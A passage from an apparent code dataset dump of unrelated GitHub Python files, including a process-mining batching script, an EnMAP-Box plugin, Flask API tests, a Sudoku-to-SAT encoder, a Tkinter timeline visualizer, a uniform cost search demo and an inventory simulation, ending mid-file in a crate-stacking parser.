this_start\r\n\r\n return service_time_total\r\n\r\n\r\ndataframe = load_dataframe()\r\nall_events = get_events_from_dataframe(dataframe)\r\ncases = set(dataframe[\"case\"].unique())\r\nactivities_resources = get_groups_from_dataframe(dataframe)\r\ncase_dict = {\"Simultaneous\": {}, \"Batching on Start\": {}, \"Batching on End\": {}, \"Sequential batching\": {},\r\n \"Concurrent batching\": {}, \"Lead Time\": {}, \"Service Time\": {}, \"Flow Time\": {}, \"Flow Rate\": {}}\r\n\r\n\r\nfor case in cases:\r\n case_events = [x for x in all_events if x[2] == case]\r\n lead_time = max(x[1] for x in case_events) - min(x[0] for x in case_events)\r\n service_time = measure_service_time(case_events)\r\n case_dict[\"Simultaneous\"][case] = 0\r\n case_dict[\"Batching on Start\"][case] = 0\r\n case_dict[\"Batching on End\"][case] = 0\r\n case_dict[\"Sequential batching\"][case] = 0\r\n case_dict[\"Concurrent batching\"][case] = 0\r\n case_dict[\"Lead Time\"][case] = lead_time\r\n case_dict[\"Service Time\"][case] = service_time\r\n case_dict[\"Flow Time\"][case] = lead_time - service_time\r\n case_dict[\"Flow Rate\"][case] = float(service_time) / float(lead_time) if lead_time > 0 else 0.0\r\n\r\n\r\nfor act_res in activities_resources:\r\n filtered_dataframe = dataframe[dataframe[\"activity\"] == act_res[0]]\r\n filtered_dataframe = filtered_dataframe[filtered_dataframe[\"resource\"] == act_res[1]]\r\n find_batches_with_type_and_count_cases(filtered_dataframe, case_dict)\r\n\r\ncase_dataframe = pd.DataFrame(case_dict)\r\ncase_dataframe[\"case\"] = case_dataframe.index.astype(str)\r\ncase_dataframe = case_dataframe.reset_index()\r\n\r\n#Set some text to show the originald dataframe\r\nst.subheader(\"Case level batching\")\r\n\r\n#Show the final dataframe\r\nst.dataframe(case_dataframe)\r\n\r\n######\r\n#Case level batch detection end\r\n\r\n\r\n# Case level batching statistics\r\nst.text(\"Case level bathcing statistics\")\r\ndf = pd.DataFrame(case_dataframe,columns=['Simultaneous','Batching on Start','Batching on End','Sequential batching', 'Concurrent batching'])\r\nsum_column = df.sum()\r\nst.dataframe(sum_column)\r\n\r\n\r\n#Plotting the data\r\nst.subheader(\"Explore the case level bathcing statistics\")\r\n\r\nxvar = st.selectbox('Select x-axis:', case_dataframe.columns[:-1])\r\nyvar = st.selectbox('Select y-axis:', case_dataframe.columns[:-1])\r\nst.write(px.scatter(case_dataframe, x=xvar, y=yvar))","repo_name":"cyangreen/Batching","sub_path":"batching.py","file_name":"batching.py","file_ext":"py","file_size_in_byte":18075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37877560416","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n***************************************************************************\r\n exampleapp/enmapboxintegration.py\r\n\r\n This module defines the interactions between an application and\r\n the EnMAPBox.\r\n ---------------------\r\n Date : Juli 2017\r\n Copyright : (C) 2017 by Benjamin Jakimow\r\n Email : benjamin.jakimow@geo.hu-berlin.de\r\n***************************************************************************\r\n* *\r\n* This program is free software; you can redistribute it and/or modify *\r\n* it under the terms of the GNU General Public License as published by *\r\n* the Free Software Foundation; either version 2 of the License, or *\r\n* (at your option) any later version. *\r\n* *\r\n***************************************************************************\r\n\r\nChangelog\r\nEnGeoMAP Version 3.2\r\nDate: February 2023\r\nAuthor: Helge L. C. Daempfling\r\nEmail: hdaemp@gfz-potsdam.de\r\n\r\nSee algorithms.py and engeomap_aux_funcul.py\r\n\r\n\"\"\"\r\n\r\nimport os\r\nfrom qgis.PyQt.QtGui import QIcon\r\nfrom enmapbox.gui.applications import EnMAPBoxApplication\r\nfrom engeomap import APP_DIR\r\n\r\n\r\nclass EnGeoMAP(EnMAPBoxApplication):\r\n\r\n def __init__(self, enmapBox, parent=None):\r\n super(EnGeoMAP, self).__init__(enmapBox, parent=parent)\r\n self.name = 'My EnMAPBox App'\r\n self.version = 'Version 0.8.15'\r\n self.licence = 'BSD-3'\r\n\r\n def icon(self):\r\n pathIcon = os.path.join(APP_DIR, 'icon.png')\r\n return QIcon(pathIcon)\r\n\r\n def menu(self, appMenu):\r\n appMenu = self.enmapbox.menu('Applications')\r\n menu = self.utilsAddMenuInAlphanumericOrder(appMenu, 'Mineral Applications')\r\n menu.setIcon(self.icon())\r\n # add a QAction that starts your GUI\r\n a = menu.addAction('EnGeoMAP 3.2')\r\n a.triggered.connect(self.startGUI)\r\n return menu\r\n\r\n def startGUI(self, *args):\r\n from engeomap.userinterfaces import EnGeoMAPGUI\r\n ui = EnGeoMAPGUI(self.enmapbox.ui)\r\n ui.show()\r\n","repo_name":"EnMAP-Box/enmap-box","sub_path":"enmapbox/apps/engeomap/enmapboxintegration.py","file_name":"enmapboxintegration.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"52"} +{"seq_id":"70519481445","text":"from flask.testing import FlaskClient\nfrom tests.api.routes.test_project import projects_root\nfrom tests.api.routes.test_model import models_root\n\ndebug_root = \"/api/v1/debug\"\n\n\ndef test_reset_db(client: FlaskClient) -> None:\n \"\"\"\n Test response of GET /debug/reset\n :param client: flask client fixture\n \"\"\"\n\n response = client.get(debug_root + \"/reset\")\n assert response.status_code == 204\n\n\ndef test_impact(client: FlaskClient) -> None:\n \"\"\"\n Test that after GET /debug/reset the impact can be computed\n :param client: flask client fixture\n \"\"\"\n client.get(debug_root + \"/reset\")\n models = client.get(projects_root)\n model_id = models.json[0][\"models\"][0][\"id\"] # retrieve the id of the first model\n\n response = client.get(models_root + \"/\" + str(model_id) + \"/impact\")\n assert response.status_code == 200\n","repo_name":"Orange-OpenSource/SoftwareLifecycleEnvImpact","sub_path":"back/tests/api/routes/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"28076045079","text":"# from flask import Flask\n#\n# app = Flask(__name__)\n#\n#\n# @app.route('/')\n# def hello_world():\n# return 'Hello World!'\n#\n#\n# if __name__ == '__main__':\n# app.run()\n\nfrom configobj import ConfigObj\nimport os\nimport socket, subprocess, sys\n\nSERVICE_DIR = ''\nTEST_DIR = './tests'\n\n\ndef runtests():\n tests = os.listdir(TEST_DIR)\n print(tests)\n os.chdir(TEST_DIR)\n for file in tests:\n if (file.endswith('.yaml')):\n os.system('py.test ' + file)\n\n\nif __name__ == '__main__':\n #python app.py test\n if sys.argv[1] == \"test\":\n runtests()\n else:\n print(\"Invalid arguments! Arguments accepted [test]\")","repo_name":"tpham523/CPSC_449_Project_1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"23214467172","text":"#\r\n# Usage: python3 sud2sat.py [-extended]\r\n#\r\n\r\nimport sys\r\nimport os\r\n\r\nFILE = 0\r\nn = 0\r\ngsat = 0\r\n\r\n#Parse and format input file to an array\r\ndef parsePuzzle(input_file):\r\n try:\r\n open_file = open(input_file)\r\n except:\r\n print(\"Can't open \" + input_file)\r\n sys.exit(-1)\r\n\r\n puzzle_string = \"\"\r\n for line in open_file.readlines():\r\n puzzle_string += ''.join(line.split())\r\n\r\n puzzle_string = puzzle_string.replace('.', '0').replace('*', '0').replace('?', '0')\r\n return puzzle_string\r\n\r\n#Converts base 9 ijk to base 10 + 1\r\ndef base9To10(i,j,k):\r\n return 81*i + 9*j + k + 1\r\n\r\n#Clauses for the preset cells set by the input file\r\ndef genInitialVars(puzzle):\r\n global n, gsat\r\n string = \"\"\r\n for i in range(9):\r\n for j in range(9):\r\n c = puzzle[i*9+j]\r\n if c != '0':\r\n if gsat:\r\n string += \"( \" + str(base9To10(i,j,int(c)-1)) + \" )\\n\"\r\n else:\r\n string += str(base9To10(i,j,int(c)-1)) + ' 0\\n'\r\n n += 1\r\n return string\r\n\r\n#Clauses ensuring each cell has a number\r\ndef genCellVars():\r\n global n\r\n string = \"\"\r\n for i in range(9):\r\n for j in range(9):\r\n if gsat:\r\n string += \"( \"\r\n for k in range(9):\r\n string += str(base9To10(i,j,k)) + ' '\r\n if gsat:\r\n string += \")\\n\"\r\n else:\r\n string += \"0\\n\"\r\n n += 1\r\n return string\r\n\r\n#Clauses ensuring uniqueness through rows\r\ndef genRowVars():\r\n global n, gsat\r\n string = \"\"\r\n for j in range(9):\r\n for k in range(9):\r\n for i in range(8):\r\n for l in range(i+1,9):\r\n if gsat:\r\n string += \"( \" + '-' + str(base9To10(j,i,k)) + \" -\" + str(base9To10(j,l,k)) + \" )\\n\"\r\n else:\r\n string += '-' + str(base9To10(j,i,k)) + \" -\" + str(base9To10(j,l,k)) + \" 0\\n\"\r\n n += 1\r\n return string\r\n\r\n#Clauses ensuring uniqueness through columns\r\ndef genColVars():\r\n global n, gsat\r\n string = \"\"\r\n for i in range(9):\r\n for k in range(9):\r\n for j in range(8):\r\n for l in range(j+1,9):\r\n if gsat:\r\n string += \"( \" + '-' + str(base9To10(j,i,k)) + \" -\" + str(base9To10(l,i,k)) + \" )\\n\"\r\n else:\r\n string += '-' + str(base9To10(j,i,k)) + \" -\" + str(base9To10(l,i,k)) + \" 0\\n\"\r\n n += 1\r\n return string\r\n\r\n#Clauses ensuring uniqueness through 3x3 sub-grids\r\ndef genSubGridVars():\r\n global n, gsat\r\n string = \"\"\r\n for k in range(9): #number\r\n for a in range(3): #grid - x\r\n for b in range(3): #grid - y\r\n for u in range(3): #cell - x\r\n for v in range(3): #cell - y\r\n for w in range(v +1,3): #check cell - x\r\n if gsat:\r\n string += \"( \" + '-' + str(base9To10(3*a+u,3*b+v,k)) + \" -\" + str(base9To10(3*a+u,3*b+w,k)) + \" )\\n\"\r\n else:\r\n string += '-' + str(base9To10(3*a+u,3*b+v,k)) + \" -\" + str(base9To10(3*a+u,3*b+w,k)) + \" 0\\n\"\r\n n += 1\r\n\r\n\r\n\r\n for k in range(9): #number\r\n for a in range(3): #grid - x\r\n for b in range(3): #grid - y\r\n for u in range(2): #cell - x\r\n for v in range(3): #cell - y\r\n for w in range(u+1,3): #check cell - x\r\n for t in range(3): #check cell - y\r\n if gsat:\r\n string += \"( \" + '-' + str(base9To10(3*a+u,3*b+v,k)) + \" -\" + str(base9To10(3*a+w,3*b+t,k)) + \" )\\n\"\r\n else:\r\n string += '-' + str(base9To10(3*a+u,3*b+v,k)) + \" -\" + str(base9To10(3*a+w,3*b+t,k)) + \" 0\\n\"\r\n n += 1\r\n return string\r\n\r\n# Extended Encoding\r\n\r\ndef cellMostOnce():\r\n global n, gsat\r\n string = \"\"\r\n for x in range(9):\r\n for y in range(9):\r\n for z in range(8):\r\n for i in range(z+1, 9):\r\n if gsat:\r\n string += \"( \" + \"-\" + str(base9To10(x,y,z))\r\n string += \" -\" + str(base9To10(x,y,i)) + \" )\\n\"\r\n else:\r\n string += \"-\" + str(base9To10(x,y,z))\r\n string += \" -\" + str(base9To10(x,y,i)) + \" 0\\n\"\r\n n+=1\r\n return string\r\n\r\ndef rowLeastOnce():\r\n global n, gsat\r\n string = \"\"\r\n for y in range(9):\r\n for z in range(9):\r\n if gsat:\r\n string += \"( \"\r\n for x in range(9):\r\n string+= str(base9To10(x,y,z)) + \" \"\r\n if gsat:\r\n string += \")\\n\"\r\n else:\r\n string += \"0\\n\"\r\n n+=1\r\n return string\r\n\r\ndef colLeastOnce():\r\n global n, gsat\r\n string = \"\"\r\n for x in range(9):\r\n for z in range(9):\r\n if gsat:\r\n string += \"( \"\r\n for y in range(9):\r\n string+= str(base9To10(x,y,z)) + \" \"\r\n if gsat:\r\n string += \")\\n\"\r\n else:\r\n string += \"0\\n\"\r\n n+=1\r\n return string\r\n\r\n\r\ndef subGridLeastOnce():\r\n global n, gsat\r\n string = \"\"\r\n for z in range(9):\r\n for i in range(3):\r\n for j in range(3):\r\n if gsat:\r\n string += \"( \"\r\n for x in range(3):\r\n for y in range(3):\r\n string += str(base9To10(3*i+x,3*j+y,z)) + \" \"\r\n if gsat:\r\n string += \")\\n\"\r\n else:\r\n string += \"0\\n\"\r\n n+=1\r\n return string\r\n\r\n\r\ndef main():\r\n global gsat\r\n \r\n if len(sys.argv) < 2:\r\n print(\"Provide an input file\")\r\n sys.exit(-1)\r\n\r\n if (len(sys.argv) >= 3 and sys.argv[2] == \"-gsat\") or (len(sys.argv) >= 4 and sys.argv[3] == \"-gsat\"):\r\n gsat = 1;\r\n\r\n puzzle = parsePuzzle(sys.argv[1])\r\n\r\n dimacs_string = genInitialVars(puzzle) + genCellVars() + genRowVars() + genColVars() + genSubGridVars()\r\n\r\n if len(sys.argv) >= 3 and sys.argv[2] == \"-extended\":\r\n dimacs_string += cellMostOnce()\r\n dimacs_string += rowLeastOnce()\r\n dimacs_string += colLeastOnce()\r\n dimacs_string += subGridLeastOnce()\r\n\r\n if gsat:\r\n print(dimacs_string)\r\n else:\r\n print(\"p cnf 729 \" + str(n) + \"\\n\" + dimacs_string)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"A3P/Sudoku","sub_path":"sud2sat.py","file_name":"sud2sat.py","file_ext":"py","file_size_in_byte":6838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"45935947688","text":"import unittest\nfrom chino.frozen_dict import FrozenDict\n\n\nclass TestFrozenDict(unittest.TestCase):\n\n def test_setattr(self):\n fd = FrozenDict()\n fd.SVM.C = 100.\n fd.SVM.IMPL = 'lbfgs'\n fd.NAME = 'frozen_dict'\n self.assertTrue(hasattr(fd, 'NAME'))\n self.assertTrue(hasattr(fd, 'SVM'))\n self.assertIsInstance(fd.SVM, FrozenDict)\n self.assertEqual(fd.SVM.C, 100.)\n self.assertEqual(fd.SVM.IMPL, 'lbfgs')\n\n def test_freeze(self):\n fd = FrozenDict()\n fd.SVM.C = 100.\n fd.SVM.IMPL = 'lbfgs'\n fd.freeze()\n self.assertTrue(fd.is_frozen())\n with self.assertRaises(AttributeError):\n _ = fd.NAME\n with self.assertRaises(KeyError):\n fd.NAME = 'oooops'\n with self.assertRaises(KeyError):\n fd.SVM = 'Not SVM Options at all'\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"demonzyj56/chino","sub_path":"tests/test_frozen_dict.py","file_name":"test_frozen_dict.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1138855745","text":"# monitor.py\n# Th 11 Oct 2018\n# Antoine Choffrut\n#\n# Code for the class 'Monitor', which has as subclasses the classes 'Sketch' and 'Timeline'\n# previously coded as separate classes.\n# - The class 'Sketch' allows to visualize selected graphics using Tkinter\n# (hence quicker than drawing then saving the image files).\n# - The class 'Timeline' visualizes the timeline of selected graphics, also using Tkinter.\n\n\nfrom constants import *\nimport Tkinter\nimport inspect\nfrom primitive import Primitive, filter_by_class, current_variables\nfrom curve import Curve\nfrom helpers import *\nfrom geometry import *\nfrom graphic import Graphic\nfrom container import get_subelements_by_class, Compound, Block\n\ndef show_and_wait(root):\n root.lift()\n root.attributes('-topmost', True)\n root.after_idle(root.attributes,'-topmost',False)\n\nclass Monitor(object):\n def initialize_canvas(self):\n canvas = Tkinter.Canvas(self.root, width = self.w, height = self.h)\n canvas.pack()\n canvas.create_rectangle(0, 0, self.w, self.h, fill = self.bgcolor)\n return canvas\n\n def resize(self, ratio):\n self.ratio = ratio\n\n def display(self):\n pass\n \n def refresh(self):\n self.canvas.delete('all')\n self.canvas.create_rectangle(0, 0, self.w, self.h, fill = self.bgcolor)\n self.display()\n show_and_wait(self.root)\n\n def report(self, indent = '', **kwargs):\n w = 10\n indent = indent\n frame_locals = inspect.currentframe().f_back.f_locals\n\n graphics = filter_by_class(frame_locals, Graphic, option = 'inclusive')\n \n\n print(indent),\n print(\"\\bid: %s\"%id(self))\n\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('name') + ':'),\n print(' '*2),\n print('{0:<14}'.format(find_name(self, frame_locals)))\n\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('class') + ':'),\n print(' '*2),\n print('{0:<14}'.format(self.main_class_name()))\n\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('canvas') + ':'),\n print(' '*2),\n print('{0:<14}'.format(self.canvas))\n\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('ratio') + ':'),\n print(' '*2),\n print('{0:<14}'.format(self.ratio))\n\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('width') + ':'),\n print(' '*2),\n print('{0:<14}'.format(str(int(self.w))))\n\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('height') + ':'),\n print(' '*2),\n print('{0:<14}'.format(str(int(self.h))))\n\n if self.graphics == []:\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('no graphics'))\n return\n elif len(self.graphics) == 1:\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format('1 graphic') + ':'),\n else:\n print(indent + ' '*2),\n print(str('{0:<' + str(w) + '}').format(str(len(self.graphics)) + ' graphics') + ':'),\n graphic = self.graphics[0]\n print(' '*3 + '+ '),\n print(\"\\bid: %s\"%id(graphic)),\n print(' '*2),\n print('{0:<14}'.format('(' + find_name(graphic, graphics) + ')'))\n \n for graphic in self.graphics[1:]:\n print(indent + ' '*(w+8) + '+ '),\n print(\"\\bid: %s\"%id(graphic)),\n print(' '*2),\n print('{0:<14}'.format('(' + find_name(graphic, graphics) + ')'))\n \n def add_graphics(self, *graphics):\n self.graphics = list(set(self.graphics + list(graphics)))\n\n\n def remove_graphics(self, *graphics):\n if 'all' in graphics:\n self.graphics = []\n return\n for graphic in graphics:\n if graphic in self.graphics:\n self.graphics.remove(graphic)\n\n\nclass Timeline(Monitor):\n def __init__(self, root, *args):\n self.bgcolor = 'linen'\n self.ratio = 1\n self.root = root\n self.root.title = 'Timeline'\n self.w = self.ratio*self.root.winfo_screenwidth()\n self.h = 0.5*self.ratio*self.root.winfo_screenheight()\n self.canvas = self.initialize_canvas()\n self.graphics = list(set([arg for arg in args if isinstance(arg, Graphic)]))\n self.root.geometry(\\\n str(int(self.w)) + 'x' + str(int(self.h)) \\\n + '+0+' + str(int(0.5*self.root.winfo_screenheight())))\n \n def main_class_name(self):\n return 'Timeline'\n\n def chrono_order(self):\n begin_times = [graphic.epochs['begin time'] for graphic in self.graphics]\n return list(np.argsort(begin_times))\n\n def all_times(self):\n if self.graphics == []:\n print(\"WARNING (method 'all_times' of class 'Timeline').\"),\n print(\"No graphics selected.\")\n curves = get_subelements_by_class(self.graphics, [], Curve)\n result = [float(epoch)\n for graphic in self.graphics\n for epoch in graphic.epochs.values()]\\\n + [float(epoch)\n for curve in curves\n for effect in curve.effects for epoch in effect.epochs.values()]\n return sorted(list(set(result)))\n \n def display(self):\n frame_locals = inspect.currentframe().f_back.f_locals\n prim_names = {frame_locals[key]: key\n for key in frame_locals\n if isinstance(frame_locals[key], Primitive)}\n self.canvas.create_text(\\\n (0.5*self.w, 0.95*self.h),\n text = \"TIMELINE (in seconds)\",\n fill = 'black',\n anchor = 's')\n if self.graphics == []:\n print(\"WARNING (method 'display' of class 'Timeline').\"),\n print(\"No graphics selected.\")\n return\n TW, TH = 0.75*self.w, 0.6*self.h\n X1, X2, Y = 0.5*(self.w-TW), 0.5*(self.w+TW), (self.h + TH)/2\n xy = (X1, Y, X2, Y)\n self.canvas.create_line(xy, fill = 'black')\n all_times = self.all_times()\n begin_time, end_time = all_times[0], all_times[-1]\n\n #\n d = self.h/120\n #\n self.canvas.create_text(\\\n translate((X1, Y), (-d, 0)),\n text = '{:.1f}'.format(all_times[0]/SECONDS),\n fill = 'black',\n anchor = 'e')\n self.canvas.create_text(\\\n translate((X2, Y), (d, 0)),\n text = '{:.1f}'.format(all_times[-1]/SECONDS),\n fill = 'black',\n anchor = 'w')\n for time in all_times[1:-1]:\n x = X1 + (time - begin_time)/float(end_time - begin_time)*(X2 - X1)\n y = Y\n xy = translate((0, d, 0, -d), (x, y))\n self.canvas.create_line(xy, fill = 'black', width = 3)\n self.canvas.create_text(\\\n translate((x, y), (0, d)),\n text = '{:.1f}'.format(time/SECONDS),\n fill = 'black',\n anchor = 'n')\n \n\n for i in range(len(self.graphics)):\n graphic = self.graphics[self.chrono_order()[i]]\n M = 12\n dy = - (i % M +1)/float(M)*TH\n #\n if isinstance(graphic, Curve):\n effects = graphic.effects\n elif isinstance(graphic, Block):\n effects = [effect\n for element in graphic.elements if isinstance(element, Curve)\n for effect in element.effects]\n else:\n effects = []\n #\n for effect in effects:\n x = X1 + (effect.epochs['begin time'] - begin_time) / \\\n float(end_time - begin_time)*(X2 - X1)\n y = Y + dy\n dx = (effect.epochs['end time'] - effect.epochs['begin time']) / \\\n float(end_time - begin_time)*(X2-X1)\n xy = (x, y, x + dx, y)\n self.canvas.create_line(xy, fill = 'red', width = 4)\n xy = translate((0, d, 0, -d), (x, y))\n self.canvas.create_line(xy, fill = 'red', width = 3)\n xy = (x + (effect.epochs['end time'] - effect.epochs['begin time']) / \\\n float(end_time - begin_time)*(X2-X1), y)\n xy = translate((0, d, 0, -d), xy)\n self.canvas.create_line(xy, fill = 'red', width = 3)\n self.canvas.create_line((x, y, x, Y), fill = 'red', width = 1, dash = (4, 6))\n self.canvas.create_line((x + dx, y, x + dx, Y), fill = 'red', width = 1, dash = (4, 6))\n\n #\n x = X1 + (graphic.epochs['begin time'] - begin_time) / \\\n float(end_time - begin_time)*(X2 - X1)\n y = Y + dy\n dx = (graphic.epochs['end time'] - graphic.epochs['begin time']) / \\\n float(end_time - begin_time)*(X2-X1)\n\n\n text = graphic.name\n self.canvas.create_text(\\\n translate((x, y), (-d, 0)),\n text = text,\n fill = 'blue',\n anchor = 'e')\n\n xy = (x, y, x + dx, y)\n self.canvas.create_line(xy, fill = 'blue', width = 1)\n\n xy = translate((0, d, 0, -d), (x, y))\n self.canvas.create_line(xy, fill = 'blue', width = 3)\n\n xy = translate((0, d, 0, -d), (x + dx, y))\n self.canvas.create_line(xy, fill = 'blue', width = 3)\n\n self.canvas.create_line((x, y, x, Y), fill = 'blue', width = 1, dash = (4, 6))\n self.canvas.create_line((x + dx, y, x + dx, Y), fill = 'blue', width = 1, dash = (4, 6))\n\n \n show_and_wait(self.root)\n\n\nclass Sketch(Monitor):\n def __init__(self, root, *args):\n\n self.bgcolor = 'black'\n self.ratio = 0.5\n self.root = root\n self.root.title = 'Sketch'\n self.w = self.ratio*self.root.winfo_screenwidth()\n self.h = self.w*H/float(W)\n self.canvas = self.initialize_canvas()\n self.graphics = list(set([arg for arg in args]))\n self.root.geometry(str(int(self.w)) + 'x' + str(int(self.h)) + '+0+0')\n\n \n def main_class_name(self):\n return 'Sketch'\n\n def display(self):\n for graphic in self.graphics:\n graphic.sketch(self.root, self.canvas, self.ratio)\n show_and_wait(self.root)\n\n \nif __name__ == '__main__':\n from primitive import Primitive\n from curve import Rectangle\n from effect import Fade\n \n #rootsketch = Tkinter.Tk()\n #sketch = Sketch(rootsketch)\n roottimeline = Tkinter.Tk()\n timeline = Timeline(roottimeline)\n\n\n\n rect0 = Rectangle(anchor = ORIGIN, width = 0.25*W, height = 0.25*H)\n rect1 = Rectangle(anchor = ORIGIN, width = 0.25*W, height = 0.25*H)\n rect1.set_times((-1*SECONDS, 5*SECONDS))\n effectA = Fade()\n rect1.add_effects(effectA)\n effectA.set_duration(2*SECONDS)\n \n rect1.move_to(CENTER)\n\n #sketch.add_graphics(rect0, rect1)\n #sketch.display()\n\n timeline.add_graphics(rect0, rect1)\n timeline.report()\n timeline.display()\n\n\n #rootsketch.mainloop()\n roottimeline.mainloop()\n","repo_name":"antoinechoffrut/dynamicslides","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":11640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33861403871","text":"# Priority Queue implementation for UCS\nclass PriorityQueue:\n def __init__(self):\n self.elements = []\n\n def enqueue(self, element):\n self.elements.append(element)\n self.elements.sort(key=lambda x: x[\"cost\"])\n\n def dequeue(self):\n return self.elements.pop(0)\n\n def is_empty(self):\n return len(self.elements) == 0\n\n\n# Function to perform Uniform Cost Search in a tree\ndef uniform_cost_search(tree, goal_node):\n # Priority queue to keep track of nodes and their cumulative costs\n priority_queue = PriorityQueue()\n\n # Initialize the priority queue with the root node and its cost (0)\n priority_queue.enqueue({\"node\": tree, \"path\": [], \"cost\": 0})\n\n while not priority_queue.is_empty():\n current = priority_queue.dequeue()\n node, path, cost = current[\"node\"], current[\"path\"], current[\"cost\"]\n\n if node[\"value\"] == goal_node:\n # Goal node found, return the cumulative cost and path\n return {\"cost\": cost, \"path\": path + [node[\"value\"]]}\n\n for child in node[\"children\"]:\n cost_to_child = child[\"cost\"]\n total_cost = cost + cost_to_child\n priority_queue.enqueue(\n {\n \"node\": child,\n \"path\": path + [node[\"value\"]],\n \"cost\": total_cost,\n }\n )\n\n return None # Goal not reachable\n\n\n# Example tree representation for testing\ntree = {\n \"value\": \"A\",\n \"cost\": 0,\n \"children\": [\n {\n \"value\": \"B\",\n \"cost\": 3,\n \"children\": [\n {\n \"value\": \"D\",\n \"cost\": 6,\n \"children\": [],\n },\n ],\n },\n {\n \"value\": \"C\",\n \"cost\": 5,\n \"children\": [\n {\n \"value\": \"E\",\n \"cost\": 2,\n \"children\": [],\n },\n {\n \"value\": \"F\",\n \"cost\": 4,\n \"children\": [],\n },\n ],\n },\n ],\n}\n\n# Test the algorithm\ngoal_node = \"D\"\nresult = uniform_cost_search(tree, goal_node)\n\nif result is not None:\n print(\"Shortest Path:\", \" -> \".join(result[\"path\"]))\n print(\"Total Cost:\", result[\"cost\"])\nelse:\n print(\"Goal not reachable.\")\n","repo_name":"iamashruu/Artificial_Intelligence_Lab","sub_path":"python/uniformCostSearch(ucs).py","file_name":"uniformCostSearch(ucs).py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38872335953","text":"import numpy as np \nimport random as rnd \n\n\n\ndef demand():\n \n random_digit = rnd.randint(1, 100)\n daily_demand = 0\n \n\n if ( random_digit >= 1 and random_digit <= 10 ):\n daily_demand = 0\n elif ( random_digit >= 11 and random_digit <= 35 ):\n daily_demand = 1\n elif ( random_digit >= 36 and random_digit <= 70 ):\n daily_demand = 2\n elif ( random_digit >= 71 and random_digit <= 91 ):\n daily_demand = 3\n else:\n daily_demand = 4\n \n return [daily_demand, random_digit]\n \n\ndef lead_time():\n random_lead = rnd.randint(0, 9)\n\n if (random_lead >= 1 and random_lead <= 6):\n lead = 1\n elif (random_lead >= 7 and random_lead <= 9):\n lead = 2\n else:\n lead = 3\n \n return [lead, random_lead]\n\ndef orders(m, end_inv):\n order_unit = m - end_inv\n return order_unit\n\ndef main():\n\n #n = 5\n #m = 11\n #inventory = 3\n #order_unit = 8\n #order_arrives = 1\n\n n,m,inventory,order_unit,order_arrives = input(\"Enter N, M, Begining_Inventory, Order_Unit, Order_Arrival Sequentially with comma: \").split(',')\n n = int(n)\n m = int(m)\n inventory = int(inventory)\n order_unit = int(order_unit)\n order_arrives = int(order_arrives)\n\n ending_inventory = []\n shortage_quantity = []\n\n print( \"Cycle\", \"Days\", \"Beg'n_Inventory\", \"Rand_Demand\", \"Demand\", \"End_Inventory\", \"Shortage\", \"Order_number\", \"Rand_Lead\", \"Order_Arrives\" )\n\n for i in range(1, n+1):\n lead = lead_time()\n \n for j in range(1, n+1):\n \n temp_order = order_arrives\n if temp_order == -1:\n temp_order = '_'\n\n \n\n if order_arrives == -1: #check krchi j order arrive koreche kina krle inventory te order amount add korechi\n inventory = inventory + order_unit - (shortage_quantity[-1] if shortage_quantity[-1] != '_' else 0)\n order_arrives = '_'\n else:\n if order_arrives != '_':\n order_arrives = order_arrives - 1\n \n \n \n \n demands = demand()\n\n\n\n if (inventory-demands[0]) >= 0:\n shortage_quantity.append('_')\n ending_inventory.append(inventory-demands[0])\n else:\n temp_val = demands[0] - inventory\n shortage_quantity.append(temp_val)\n ending_inventory.append(0)\n \n \n \n \n \n \n print(\" {}\\t{}\\t {}\\t\\t{}\\t{}\\t{}\\t\\t{}\\t{}\\t {}\\t\\t {}\".format(i if j==1 else ' ', j, inventory, demands[1], demands[0], ending_inventory[-1], shortage_quantity[-1], orders(m, ending_inventory[-1]) if j==n else '_', lead[1] if j==n else '_', temp_order) )\n #print('\\n')\n inventory = ending_inventory[-1]\n \n #order_unit = m - ending_inventory[-1]\n order_arrives = lead[0]\n print('\\n')\n\n\n print(\"Average Number of Ending Inventory: {}\".format( (sum(ending_inventory)/len(ending_inventory)) ) )\n\n \n print(\"Average Number of Shortage in Days: {}\".format( sum( i!='_' for i in shortage_quantity )/(n*n) ) )\n \n \n\n\n \n\n \n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"tonmoy50/uiu","sub_path":"Simultion Lab/inventory_management.py","file_name":"inventory_management.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35628045224","text":"from collections import defaultdict\nimport time\n\n\ntime_start = time.time()\n[crates, moves] = open('input.txt', 'r').read().split('\\n\\n')\n\nlines = crates.split('\\n')[:-1]\nprint(crates)\n\nstacks = defaultdict(lambda: [])\n\nfor i, line in enumerate(lines):\n n = 0\n stack_counter = 1\n while n < len(line):\n if line[n] == '[':\n stacks[stack_counter].append(line[n+1])\n n += 